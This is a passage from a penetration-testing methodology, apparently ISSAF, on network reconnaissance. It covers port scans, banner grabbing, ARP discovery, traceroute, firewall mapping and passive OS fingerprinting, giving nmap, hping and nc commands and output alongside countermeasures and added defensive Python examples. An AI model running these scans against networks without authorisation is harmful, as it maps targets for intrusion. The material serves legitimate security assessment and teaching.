(The 1594 ports scanned but not shown below are in state: closed)
Port       State    Service
21/tcp     open     ftp
23/tcp     open     telnet
80/tcp     open     http
280/tcp    open     http-mgmt
515/tcp    open     printer
631/tcp    open     ipp
9100/tcp   open     jetdirect
Using nmap with complete scan and no ping:
# nmap -sT -P0 192.168.1.254
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 10:42 CDT
Interesting ports on gateway (192.168.1.254):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
Using hping to create a custom SYN+FIN scan (not supported by nmap); note how port 22 responds on a Linux system:
# hping -SF 192.168.0.254 -p ++20 -c 10
HPING 192.168.0.254 (eth0 192.168.0.254): SF set, 40 headers + 0 data bytes
len=46 ip=192.168.0.254 ttl=242 DF id=14 sport=20 flags=RA seq=0 win=0 rtt=5.0 ms
len=46 ip=192.168.0.254 ttl=242 DF id=15 sport=21 flags=RA seq=1 win=0 rtt=5.4 ms
len=46 ip=192.168.0.254 ttl=242 DF id=0 sport=22 flags=SA seq=2 win=5840 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=16 sport=23 flags=RA seq=3 win=0 rtt=4.0 ms
len=46 ip=192.168.0.254 ttl=242 DF id=17 sport=24 flags=RA seq=4 win=0 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=18 sport=25 flags=RA seq=5 win=0 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=19 sport=26 flags=RA seq=6 win=0 rtt=4.1 ms
len=46 ip=192.168.0.254 ttl=242 DF id=20 sport=27 flags=RA seq=7 win=0 rtt=3.4 ms
len=46 ip=192.168.0.254 ttl=242 DF id=21 sport=28 flags=RA seq=8 win=0 rtt=4.1 ms
len=46 ip=192.168.0.254 ttl=242 DF id=22 sport=29 flags=RA seq=9 win=0 rtt=3.5 ms
Analysis/Conclusion/Observation
A list of open, closed or filtered ports. Services shown by port scanners can be probed for vulnerabilities.
Countermeasures
Implement properly configured firewalls, only allowing through what is absolutely needed.
Also, restrict source addresses in firewalls if a certain service should not be accessible to
anyone (e.g. restrict administration services on routers so that only workstations from
administrators have access).
Links
• http://www.ouah.org/portscandethly.pdf
• http://www.sys-security.com/archive/papers/Network_Scanning_Techniques.pdf
Tools
• Nmap
• Netcat
• Hping
• Fscan
• Other port scanning tools
Remarks
Never rely on a single result of a port scanning tool; perform the port scan twice or more with two or more different tools. Test different TCP scanning techniques (e.g. ACK, FIN, SYN, idle, complete scans). Complete scans (i.e. complete 3-way handshake) will yield the least number of false positives, but other scan types have better chances of evading security controls.
Stealth scanning techniques will provide results of differing accuracy, depending on the type of system being scanned (i.e. responses from Solaris, Windows and Linux will be different).
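The live-host lists and port tables from the two sections above are only useful once they are compared against what the firewall policy says should be reachable ("only allowing through what is absolutely needed"). The script below is an added example, not ISSAF or nmap code: it parses the normal-output format shown in the examples (the "Host (...) appears to be up/down" lines and the "port/proto state service" rows) and reports every host that answered but is absent from a baseline, and every open port that the baseline does not authorise. The scan text is assembled from the outputs printed above; the baseline is invented for the example.

```python
"""Turning scanner output into an exposure report (added example; not part
of ISSAF or nmap). Parses nmap's normal output as shown in the ISSAF
examples and diffs it against a constructed baseline of permitted exposure.
"""
import re

# Assembled from the scan outputs shown above (nmap 3.81 normal output).
SCAN_OUTPUT = """\
Starting nmap V. 3.81 ( www.insecure.org/nmap/ )
Host (10.3.8.1) appears to be down.
Host (10.3.8.5) appears to be up ... good.
Initiating SYN Stealth Scan against (10.3.8.5)
Interesting ports on (10.3.8.5):
(The 1594 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
80/tcp     open        http
280/tcp    open        http-mgmt
515/tcp    open        printer
631/tcp    open        ipp
9100/tcp   open        jetdirect
Interesting ports on gateway (192.168.1.254):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
"""

# Constructed baseline: what the policy says should answer from the scan location.
BASELINE = {
    "10.3.8.5": {"80/tcp", "515/tcp", "631/tcp", "9100/tcp"},
}

HOST_RE = re.compile(r"^Host \(([\d.]+)\) appears to be (up|down)")
PORTS_RE = re.compile(r"^Interesting ports on (?:\S+ )?\(([\d.]+)\):")
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\w+(?:\|\w+)?)\s+(\S+)")


def parse_nmap(text):
    """Return ({ip: 'up'|'down'}, {ip: {'port/proto': (state, service)}})."""
    hosts, ports, current = {}, {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            hosts[m.group(1)] = m.group(2)
            continue
        m = PORTS_RE.match(line)
        if m:
            current = m.group(1)
            ports.setdefault(current, {})
            continue
        m = PORT_RE.match(line)
        if m and current:
            ports[current][m.group(1)] = (m.group(2), m.group(3))
    return hosts, ports


def exposure_report(text, baseline):
    """List hosts and open ports that answered but are not authorised by the baseline."""
    hosts, ports = parse_nmap(text)
    findings = []
    live = {ip for ip, state in hosts.items() if state == "up"} | set(ports)
    for ip in sorted(live - set(baseline)):
        findings.append(f"{ip}: answered but not in baseline")
    for ip, plist in ports.items():
        by_number = sorted(plist.items(), key=lambda kv: int(kv[0].split("/")[0]))
        for port, (state, service) in by_number:
            if state == "open" and port not in baseline.get(ip, set()):
                findings.append(f"{ip}: {port} ({service}) open but not in baseline")
    return findings


if __name__ == "__main__":
    for finding in exposure_report(SCAN_OUTPUT, BASELINE):
        print("-", finding)
```

Run the same comparison after each firewall change: a port that moves from "closed" to "open" between two scans of the same host shows up as a new finding without anyone having to read the raw output.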
B.2.2.1.2 UDP PORT SCANNING
Description
UDP Port scanning will give you all listening, closed or filtered UDP ports on a certain
target. UDP Port scanning is performed by sending a raw UDP frame to the target and
watching the replies to this UDP frame.
The following example will scan the target and list all the open udp services running on it.
Examples/Results
[root@localhost root]# nmap -sU 10.3.8.5 -vv
Starting nmap V. 3.81 ( www.insecure.org/nmap/ )
Host (10.3.8.5) appears to be up ... good.
Initiating UDP Scan against (10.3.8.5)
The UDP Scan took 12 seconds to scan 1468 ports.
Adding open port 161/udp
Adding open port 427/udp
Interesting ports on (10.3.8.5):
(The 1466 ports scanned but not shown below are in state: closed)
Port       State    Service
161/udp    open     snmp
427/udp    open     svrloc
Nmap run completed -- 1 IP address (1 host up) scanned in 12 seconds
Analysis/Conclusion/Observation
A list of Open, Closed or filtered UDP ports.
Countermeasures
Implement properly configured firewalls, only allowing through what is absolutely needed.
Also, restrict source addresses in firewalls if a certain service should not be accessible to
anyone (e.g. restrict administration services on routers so that only workstations from
administrators have access).
Links
Tools
• Nmap
• Netcat
• Hping
• Udp_scan
Remarks
Never rely on a single result of a port scanning tool; perform the port scan twice or more with two or more tools.
Due to the nature of the UDP protocol, UDP port scans frequently show false positives. Take into account that:
• Sending a UDP packet to an open port will receive no answer from the server.
• Only closed ports will reply with an ICMP error message. Therefore, closed ports behind firewalls that egress-filter these ICMP error messages might be reported as open by the port scanner (if you see hundreds or thousands of ports reported as open, this might be the case).
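The two remarks above are the whole decision procedure of a UDP scanner, and writing it out shows why the result is so easily wrong. The block below is an added example (not ISSAF or nmap code): each probe outcome is a constructed record of what came back for one port, and classify() applies the rules from the remarks (no answer is ambiguous, ICMP port unreachable means closed, any other ICMP unreachable means something in the path objected, a UDP reply means open). summarise() adds the rule of thumb from the last bullet: a scan in which nearly every port went unanswered most likely met a filter on ICMP errors, not hundreds of listening services. The state name "open|filtered" is nmap's term for the ambiguous case; the port lists and replies are constructed.

```python
"""How a UDP scanner infers port state, and why silence is ambiguous
(added example; not ISSAF or nmap code). Probe outcomes are constructed.
"""
from collections import Counter

ICMP_UNREACHABLE = 3        # ICMP type 3, destination unreachable
PORT_UNREACHABLE = 3        # code 3: the host itself says nothing listens there


def classify(outcome):
    """outcome is ('udp', payload) | ('icmp', type, code) | ('timeout',)."""
    kind = outcome[0]
    if kind == "udp":
        return "open"                       # a service answered in its own protocol
    if kind == "icmp":
        _, icmp_type, code = outcome
        if (icmp_type, code) == (ICMP_UNREACHABLE, PORT_UNREACHABLE):
            return "closed"                 # only a closed port produces this
        return "filtered"                   # host/net/admin prohibited: a device in the path objected
    return "open|filtered"                  # no reply: open service that stayed quiet, or dropped


def summarise(results, ambiguous_ratio=0.9):
    """results: {port: outcome}. Returns (Counter of states, warning or None)."""
    counts = Counter(classify(outcome) for outcome in results.values())
    warning = None
    if results and counts["open|filtered"] / len(results) >= ambiguous_ratio:
        warning = ("nearly all ports unanswered: suspect ICMP errors are being filtered, "
                   "not that hundreds of services are listening")
    return counts, warning


# Constructed: a host that returns ICMP errors normally (two real services, eight closed ports)...
NORMAL_HOST = {
    53: ("udp", b"\x00\x00\x81\x80"),
    161: ("udp", b"\x30\x26\x02\x01"),
    **{p: ("icmp", 3, 3) for p in (67, 69, 123, 137, 138, 500, 514, 1434)},
}
# ...and the same host behind a firewall that drops outbound ICMP errors.
FIREWALLED_HOST = {
    53: ("udp", b"\x00\x00\x81\x80"),
    **{p: ("timeout",) for p in (67, 69, 123, 137, 138, 161, 500, 514, 1434)},
}

if __name__ == "__main__":
    for label, scan in (("normal", NORMAL_HOST), ("firewalled", FIREWALLED_HOST)):
        counts, warning = summarise(scan)
        print(label, dict(counts), warning or "")
```

The firewalled case is the one the remark warns about: port 161 was open in both scans, but behind the ICMP filter it is indistinguishable from the nine ports that were merely dropped.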
B.2.2.1.3 BANNER GRABBING
Description
Banner grabbing is also known as service fingerprinting. With this technique, an attacker
looks at the headers or banners of open ports to see what service is running behind that
open port. This banner grabbing can be performed manually (with nc or telnet) or semiautomatically (with nmap, amap or other banner grabbing tool).
Basic banner grabbing (or version detection) can be performed with nmap as well. The
option to use then with nmap is “-sV”. This option has to be used together with a port scan
option (like “-sS” or “-sT”).
Examples/Results
[root@localhost root]# nc -vv www.target.com 80
Warning: inverse host lookup failed for 192.168.0.1: Unknown host
www.target.com [192.168.0.1] 80 (http) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Sun, 12 Oct 2003 13:36:46 GMT
Server: Apache/1.3.26 (Unix) mod_jk mod_perl/1.27 mod_perl/1.27
Last-Modified: Mon, 06 Oct 2003 08:13:35 GMT
ETag: "1f881e-7a95-3f81242f"
Accept-Ranges: bytes
Content-Length: 31381
Connection: close
Content-Type: text/html
sent 18, rcvd 286
[root@localhost root]# nmap -sS -sV 10.0.0.1
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-05-29 20:03 CDT
Interesting ports on localhost (10.0.0.1):
(The 1662 ports scanned but not shown below are in state: closed)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 3.9p1 (protocol 2.0)
[root@localhost root]# amap -v 10.0.0.1 22
amap v4.8 (www.thc.org/thc-amap) started at 2005-05-29 20:58:53 - MAPPING mode
Total amount of tasks to perform in plain connect mode: 17
Waiting for timeout on 17 connections ...
Protocol on 10.0.0.1:22/tcp (by trigger http) matches ssh
Protocol on 10.0.0.1:22/tcp (by trigger http) matches ssh-openssh
Unidentified ports: none.
Analysis/Conclusion/Observation
Banner grabbing will give you a list of all open ports with the associated services running
behind these open ports. This could also tell you what operating system is in use on the
target system.
Countermeasures
Changing version numbers and product names in service banners will make it more difficult for an attacker to correctly identify a system. However, it should be noted that this solution is not bullet-proof and doesn't make systems more secure.
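Before deciding whether a banner is worth trimming, it helps to know exactly which headers of your own server give away product and version. The block below is an added example (not ISSAF or netcat code): it parses a raw HTTP response, such as the one captured with nc above, and lists every product/version token found in the headers that typically disclose them. The response text is adapted from the capture above, with a constructed X-Powered-By header added to show a second disclosing header; no live host is contacted.

```python
"""Which response headers disclose product versions (added example; not
ISSAF or netcat code). Parses a raw HTTP response and extracts
product/version tokens from the headers that usually carry them.
"""
import re

# Adapted from the nc capture above; the X-Powered-By line is constructed.
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 12 Oct 2003 13:36:46 GMT\r\n"
    "Server: Apache/1.3.26 (Unix) mod_jk mod_perl/1.27\r\n"
    "X-Powered-By: PHP/4.3.3\r\n"
    "Content-Length: 31381\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Headers that commonly name a product and its version.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")
# "Product/1.2.3" tokens; the version may carry a suffix such as "p1" or "-beta".
PRODUCT_VERSION_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)*[\w-]*)")


def parse_headers(raw):
    """Return (status_line, [(lower_name, value), ...]) for a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def disclosed_versions(raw):
    """Return [(header, product, version), ...] for every version the banner leaks."""
    _, headers = parse_headers(raw)
    leaks = []
    for name, value in headers:
        if name in DISCLOSING_HEADERS:
            for product, version in PRODUCT_VERSION_RE.findall(value):
                leaks.append((name, product, version))
    return leaks


if __name__ == "__main__":
    for header, product, version in disclosed_versions(RESPONSE):
        print(f"{header}: {product} {version}")
```

A server configured to send only "Server: Apache" yields an empty list here; as the countermeasure text says, that hides the version from a casual HEAD request without removing the vulnerability the version would have pointed to.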
Links
• http://www.liquidinfo.net/papers/nc_usage.html
• http://www.hackinthebox.org/article.php?sid=7947
Tools
• Grabbb
• Languard
• Nmap
• Amap
• Netcat
• telnet
Remarks
Automatic banner grabbing tools don't display all interesting information; manual banner grabbing should always be performed as well.
B.2.2.2 ARP DISCOVERY
Description
Using ARP requests, one can find out which systems are active on the local subnet without having an IP address on that local subnet.
To perform this, the attacker sends out ARP request packets ("who has IP address x.x.x.x?"). If the system with IP address x.x.x.x is active, it will answer with an ARP reply packet ("I have x.x.x.x, my MAC address is AA:BB:CC:DD:EE:FF").
Examples/Results
# arping 10.0.0.1
ARPING 10.0.0.1 from 10.0.0.100 eth0
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 1.584ms
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 0.863ms
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 0.863ms
Analysis/Conclusion/Observation
Once an attacker or assessor has gained access to a LAN, ARP discovery will give them
the MAC address of the system. Several hijacking attacks and denial of service can take
place under this situation.
Countermeasures
The use of switched LANs along with port locking and VLANs will limit the ability to perform ARP pings, as well as the attacks that could be performed if this capability is available. Consider the use of port locking on switches and VLANs at least for critical production systems.
Links
• http://www.ietf.org/rfc/rfc894.txt
• http://www.ietf.org/rfc/rfc826.txt
Tools
• Arping
• Arpwatch
• Arp + protocol analyzer
Remarks
This only works on the local LAN to which you are connected.
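Arpwatch, listed in the tools above, is the defender's counterpart to arping: it records which MAC answers for each IP on the segment and reports when a new station appears or an existing IP starts answering from a different MAC, which is how both discovery and the hijacking attacks mentioned above become visible where port locking is not in place. The block below is an added example (not ISSAF or arpwatch code) of that logic over a constructed list of observed ARP replies; the first reply reuses the address pair from the arping output above, the rest are invented.

```python
"""An arpwatch-style IP-to-MAC monitor (added example; not ISSAF or
arpwatch code). Observed replies are constructed (ip, mac) pairs.
"""

# Constructed observations; the first pair is taken from the arping output above.
OBSERVED_REPLIES = [
    ("10.0.0.1", "DE:30:3A:CA:D4:44"),
    ("10.0.0.1", "DE:30:3A:CA:D4:44"),
    ("10.0.0.20", "02:00:00:00:00:20"),
    ("10.0.0.1", "02:00:00:00:00:99"),   # constructed: the gateway IP answers from a new MAC
    ("10.0.0.20", "02:00:00:00:00:20"),
]


class ArpTable:
    """Remembers the MAC last seen for each IP and reports changes."""

    def __init__(self):
        self.table = {}            # ip -> mac
        self.flip_flops = {}       # ip -> number of times the MAC has changed

    def observe(self, ip, mac):
        """Record one ARP reply; return an event tuple or None if nothing changed."""
        mac = mac.upper()
        previous = self.table.get(ip)
        self.table[ip] = mac
        if previous is None:
            return ("new station", ip, mac)
        if previous != mac:
            self.flip_flops[ip] = self.flip_flops.get(ip, 0) + 1
            return ("changed ethernet address", ip, f"{previous} -> {mac}")
        return None


def monitor(replies):
    """Feed a sequence of replies through a fresh table and collect the events."""
    table = ArpTable()
    events = []
    for ip, mac in replies:
        event = table.observe(ip, mac)
        if event:
            events.append(event)
    return events


if __name__ == "__main__":
    for event in monitor(OBSERVED_REPLIES):
        print(*event)
```

A single "changed ethernet address" for a gateway IP is the event worth paging on: either the router was replaced, or another station on the segment is answering in its name.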
B.2.2.2.1 VERIFY RUNNING SERVICES BY ESTABLISHING FALSE COMMUNICATION
Tools
Amap, nessus
B.2.3 Identify Perimeter Network (Router / Firewalls)
B.2.3.1 IDENTIFY PERIMETER NETWORK – TRACEROUTING
Description
Traceroute will tell you several things about a network:
• the path to that network
• intermediate routers and/or devices
• potential information about filtering devices
• potential information about allowed protocols
Examples/Results
Using ICMP (default on Windows)
• C:\> tracert <target>
• # traceroute -I <target>
Using UDP (default on Linux, not standard on Windows)
• # traceroute <target>
Using TCP
• # tcptraceroute <target>
Note: Disabling DNS lookups while performing trace routes will result in a faster response!
Analysis/Conclusion/Observation
Analyze the reply traffic for ICMP error messages:
• Identify routers and firewalls using ICMP Admin Prohibited packets.
• ICMP Admin Prohibited packet = ICMP type 3 message with code 13
Countermeasures
• Block ICMP echo requests at the firewall or external router
• Block UDP packets at the firewall
• Egress filter ICMP TTL Exceeded and Destination Unreachable packets
• Allow traffic in through the firewall only to specific hosts
Links
• http://www.ietf.org/rfc/rfc0792.txt
Tools
• Traceroute, tcptraceroute, xtraceroute (Linux)
• Tracert (Windows)
• http://www.traceroute.org
• www.tracert.com/cgi-bin/trace.pl
Remarks
Routes between hosts are not static; they may change due to routing protocols. Also, there
might be more than one perimeter router on the target network (e.g. redundant connection
with different ISP). Therefore, it is important to make several tests, from different locations
and ISPs.
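The following Python code is an added example, not part of ISSAF or of any traceroute implementation: it parses ICMP messages as RFC 792 lays them out (verifying the checksum) and walks a recorded trace to find the hop that answered with type 3 code 13, which is the filtering device the analysis above looks for. The hop addresses (RFC 5737 documentation ranges) and the zero-filled quoted datagram are constructed sample data.

```python
import struct
from typing import Dict, List, Tuple

ICMP_HDR = struct.Struct("!BBHI")  # type, code, checksum, rest of header (RFC 792)

# (type, code) pairs a traceroute is likely to see, named as in RFC 792 / RFC 1812
ICMP_NAMES: Dict[Tuple[int, int], str] = {
    (0, 0): "echo reply",
    (3, 0): "net unreachable",
    (3, 1): "host unreachable",
    (3, 3): "port unreachable",
    (3, 4): "fragmentation needed and DF set",
    (3, 13): "communication administratively prohibited",
    (8, 0): "echo request",
    (11, 0): "time to live exceeded in transit",
}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words, zero-padded to even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_icmp(icmp_type: int, code: int, payload: bytes = b"") -> bytes:
    """Constructed ICMP message with a valid checksum (sample data only)."""
    csum = icmp_checksum(ICMP_HDR.pack(icmp_type, code, 0, 0) + payload)
    return ICMP_HDR.pack(icmp_type, code, csum, 0) + payload


def parse_icmp(data: bytes) -> dict:
    if len(data) < ICMP_HDR.size:
        raise ValueError("truncated ICMP message")
    if icmp_checksum(data) != 0:  # a correct checksum makes the whole message sum to all ones
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _csum, _rest = ICMP_HDR.unpack_from(data)
    return {"type": icmp_type, "code": code,
            "name": ICMP_NAMES.get((icmp_type, code), "unassigned/other"),
            "quoted": data[ICMP_HDR.size:]}  # for error types: original IP header + 8 bytes


def is_valid_icmp(data: bytes) -> bool:
    try:
        parse_icmp(data)
        return True
    except ValueError:
        return False


def analyse_trace(hops: List[Tuple[int, str, bytes]]) -> dict:
    """hops: (hop number, replying address, raw ICMP reply) as a UDP traceroute records them.
    The first hop answering with type 3 code 13 is the filtering device; type 3 code 3 means
    the probe reached the target's (closed) UDP port."""
    result = {"path": [], "filter_hop": None, "reached": False}
    for number, addr, raw in hops:
        msg = parse_icmp(raw)
        result["path"].append((number, addr, msg["name"]))
        if (msg["type"], msg["code"]) == (3, 13) and result["filter_hop"] is None:
            result["filter_hop"] = (number, addr)
        if (msg["type"], msg["code"]) == (3, 3):
            result["reached"] = True
    return result


def sample_trace() -> dict:
    """Constructed trace: two routers expire the TTL, then the perimeter device refuses the probe."""
    quoted = bytes(28)  # placeholder for the quoted IP header + 8 bytes of the original datagram
    hops = [
        (1, "192.0.2.1", build_icmp(11, 0, quoted)),
        (2, "192.0.2.254", build_icmp(11, 0, quoted)),
        (3, "203.0.113.1", build_icmp(3, 13, quoted)),
    ]
    return analyse_trace(hops)


if __name__ == "__main__":
    r = sample_trace()
    for hop in r["path"]:
        print(hop)
    print("filtering device at hop", r["filter_hop"])
```

The same classification applied to egress traffic is what the "egress filter ICMP TTL Exceeded and Destination Unreachable" countermeasure above removes from an outsider's view.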
B.2.3.2 IDENTIFY PERIMETER NETWORK – USING ADMIN PROHIBITED PACKETS
ICMP Admin Prohibited packet = ICMP type 3 message with code 13
B.2.3.3 SCAN DEFAULT FIREWALL/ROUTER PORTS
Description
Search for ports used for administrative access and for ports that are useful to identify a
certain brand of firewall.
Search for banners that identify the brand and version of firewall being used.
Process
• Perform port scanning (SYN, ACK, FIN, XMAS, UDP, NULL) and OS guessing with a port
scanner or manual scanning procedures.
• Using common server ports (e.g. 53, 80, 443) as source ports will yield better results
against stateless firewalls.
Analysis/Conclusion/Observation
Firewall administration ports, even if they use strong authentication algorithms, should
never be available from outside the corporate network. Ports that identify the brand/version
of a firewall should be filtered, and banners (e.g. from application proxies) should be
changed if possible to make firewall fingerprinting more difficult.
Being able to access an administration port, or just being able to identify the firewall brand
and version, doesn't mean it is vulnerable. However, since we are talking about the most
widely used, most effective, and sometimes the only type of defense used in networks, the
impact of a flaw in this kind of security control is so big that even these simple
recommendations should be taken seriously.
Countermeasures
• Filter all administration ports
• Change banners that allow identification
• Use a separate network or VLAN for administration
Links
• http://www.spitzner.net/audit.html
• http://www.cert.org/security-improvement/practices/p060.html
Tools
• Netcat
• hping
• nmap
Remarks
See the firewall ports document for all default ports used by most firewall systems.
The Firewall Assessment Section contains detailed information for testing this kind of
security controls.
B.2.3.4 PERFORM FIN/ACK SCAN
Description
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
• nmap
Remarks
B.2.3.5 MAP ROUTER / FIREWALL RULE-BASE
Description
Analyze the information gained in Banner Grabbing and port scanning tests, and map
router and firewall rule-base. Use specialized tools for network mapping to map the
network behind the firewall.
Process
Map firewall and router rules using the following guidelines:
• For each open service found, create and document an accept rule
• For each rule, try to map its restrictions (e.g. IP address restrictions)
• Also, using banners, try to identify and document whether open services are behind
proxies or not (e.g. conflicting reports for O.S. and application identification usually
mean proxied services)
Analysis/Conclusion/Observation
Firewall rule mapping will give both attackers and assessors insight into the network
structure, which can be used to tune future tests. This kind of information might include, for
example:
• Network map
• Number and kind of services available
o Indicates the permeability of the network
o Indicates the complexity of the network
o Indicates the core business network services
Countermeasures
In order to restrict the risks involved in network mapping, an organization should:
• Enable access only to those network services that are needed by the business
• Avoid the use of exceptions that would be reflected in firewall and router rules
(increasing the complexity of administering these devices)
• Avoid the use of negative logic filtering rules (i.e. rules that specifically block illegal
access while implicitly permitting everything else)
Links
• http://www.packetfactory.net/projects/firewalk/firewalk-final.pdf
Tools
• Firewalk
• Ftester
• Netcat
• Nmap
• Amap
Remarks
Network mapping is a complex and time-consuming task. Allow changes and adjustments
to the results to take place, even after you have finished this test, by using feedback from
subsequent tests.
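Added example, not from ISSAF and not Firewalk's code: a Python routine that turns a set of constructed scan observations into documented accept rules following the guidelines above, recording source-address restrictions, evidence of a stateless filter (a service reachable only when a server port such as 53 was used as the source port, as B.2.3.3 notes) and O.S. conflicts that point at proxied services. The Probe and Rule structures, the RFC 5737 addresses and the O.S. labels are assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Probe:
    """One scan observation: what a probe to host:port saw, sent from which network and source port."""
    host: str
    port: int
    proto: str      # "tcp" or "udp"
    state: str      # "open", "closed" or "filtered"
    src_port: int   # scanner's source port (ephemeral, or a server port such as 53/80/443)
    src_net: str    # network the probe was sent from


@dataclass
class Rule:
    host: str
    port: int
    proto: str
    action: str = "accept"
    restrictions: List[str] = field(default_factory=list)
    notes: List[str] = field(default_factory=list)


SERVER_SRC_PORTS = (53, 80, 443)


def map_rules(probes: List[Probe], banner_os: Dict[Tuple[str, int], str],
              stack_os: Dict[str, str]) -> List[Rule]:
    """Derive one accept rule per reachable service, with restrictions and proxy/stateless notes."""
    by_service: Dict[Tuple[str, int, str], List[Probe]] = {}
    for p in probes:
        by_service.setdefault((p.host, p.port, p.proto), []).append(p)

    rules: List[Rule] = []
    for (host, port, proto), obs in sorted(by_service.items()):
        open_obs = [o for o in obs if o.state == "open"]
        if not open_obs:
            continue  # closed/filtered from everywhere: nothing to document as an accept rule
        rule = Rule(host, port, proto)

        # restriction: open from some source networks but filtered from others
        open_nets = {o.src_net for o in open_obs}
        blocked_nets = {o.src_net for o in obs if o.state == "filtered"} - open_nets
        if blocked_nets:
            rule.restrictions.append("source restricted to " + ", ".join(sorted(open_nets)))

        # stateless-filter evidence: same source network, open only when a server source port was used
        for net in sorted(open_nets):
            ephemeral = [o for o in obs if o.src_net == net and o.src_port not in SERVER_SRC_PORTS]
            privileged = [o for o in open_obs if o.src_net == net and o.src_port in SERVER_SRC_PORTS]
            if privileged and ephemeral and all(o.state == "filtered" for o in ephemeral):
                rule.notes.append(f"reachable only with source port {privileged[0].src_port}: "
                                  "likely a stateless (source-port based) filter")
                break

        # proxy evidence: the banner's O.S. family disagrees with the host's stack fingerprint
        b_os, s_os = banner_os.get((host, port)), stack_os.get(host)
        if b_os and s_os and b_os.split()[0] != s_os.split()[0]:
            rule.notes.append(f"O.S. conflict (stack: {s_os}; banner: {b_os}): probably a proxied service")
        rules.append(rule)
    return rules


def sample_rules() -> List[Rule]:
    """Constructed scan results for one target seen from two vantage networks."""
    net_a, net_b = "198.51.100.0/24", "192.0.2.0/24"
    probes = [
        Probe("203.0.113.10", 80, "tcp", "open", 40000, net_a),
        Probe("203.0.113.10", 80, "tcp", "open", 40001, net_b),
        Probe("203.0.113.10", 22, "tcp", "open", 40000, net_a),
        Probe("203.0.113.10", 22, "tcp", "filtered", 40001, net_b),
        Probe("203.0.113.10", 25, "tcp", "filtered", 40000, net_a),
        Probe("203.0.113.10", 25, "tcp", "open", 53, net_a),
        Probe("203.0.113.10", 443, "tcp", "closed", 40000, net_a),
        Probe("203.0.113.10", 443, "tcp", "closed", 40001, net_b),
    ]
    banner_os = {("203.0.113.10", 80): "Windows (Microsoft-IIS banner)"}  # constructed
    stack_os = {"203.0.113.10": "Linux 2.4.x"}                             # constructed
    return map_rules(probes, banner_os, stack_os)


if __name__ == "__main__":
    for rule in sample_rules():
        print(rule)
```

Each derived rule is a hypothesis to be refined by later tests, which is the feedback loop the Remarks above ask for.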
B.2.4 Countermeasure
B.2.5 Further reading
http://www.networkintrusion.co.uk/enum.htm
http://tinyurl.com/o5he
B.2.6 Tools
Nmap
Pinger
Fping
NetCat
SuperScan
B.2.7 Operating System Fingerprinting
B.2.7.1 PASSIVE OS GUESSING
Description
By sniffing and comparing the Time To Live and Window Sizes, one can identify the remote
operating system in use.
This can be easily accomplished by using p0f or by putting a protocol analyzer to listen to
traffic, and then doing manual analysis of the traffic that is captured.
Process
Set up a sniffer or a passive fingerprinting tool (e.g. p0f) in listening mode. You will be
able to collect information on O.S. brands on the local network directly (unless you are in a
switched environment).
Also, you will be able to collect information from all machines or servers establishing a
connection to your equipment, or from those machines that you try to connect to.
If fingerprinting manually, you will have to analyze the captured network packets yourself
in order to identify the system, using several techniques (e.g. initial TTL in the header,
window size in the header, response to overlapped packets, etc.).
Examples/Results
Using p0f for scanning incoming connections:
# p0f
p0f - passive os fingerprinting utility, version 2.0.5
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN) on 'eth0', 231 sigs (13 generic), rule: 'all'.
192.168.1.101:1298 - Windows XP SP1, 2000 SP3 (2)
-> 192.168.1.102:22 (distance 0, link: ethernet/modem)
192.168.1.102:2298 - Linux 2.5 (sometimes 2.4) (4) (up: 2 hrs)
-> 10.1.1.1:80 (distance 0, link: ethernet/modem)
Using p0f for scanning responses to outgoing connections:
# p0f -A
p0f - passive os fingerprinting utility, version 2.0.5
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN+ACK) on 'eth0', 57 sigs (1 generic), rule: 'all'.
xxx.xxx.xxx.xxx:80 - FreeBSD 5.0 [high throughput] (up: 1411 hrs)
-> 192.168.1.102:2945 (distance 12, link: sometimes DSL (3))
Analysis/Conclusion/Observation
Passive OS guessing will provide information on the O.S. brand and version. This
information will be useful to tune active tests (e.g. vulnerability scanning).
Companies should do their best to thwart O.S. identification of critical systems.
Countermeasures
If possible, modify information on packet headers such as TTL in critical systems. This
should at least confuse an attacker, forcing her/him to make more noisy scans that should
show up more easily in intrusion detection systems to alert the target organization.
Links
• http://www.packetwatch.net/documents/papers/osdetection.pdf
• http://www.usenix.org/publications/library/proceedings/sec2000/full_papers/smart/smart_html/index.html
Tools
• p0f
• Several protocol analyzers
Remarks
You can perform passive OS guessing while doing other information gathering tests (e.g.
leave p0f running with the -A option). Just be aware that some active tests can trigger device
filters that would modify the response (e.g. you might end up fingerprinting a firewall
instead of a server behind it).
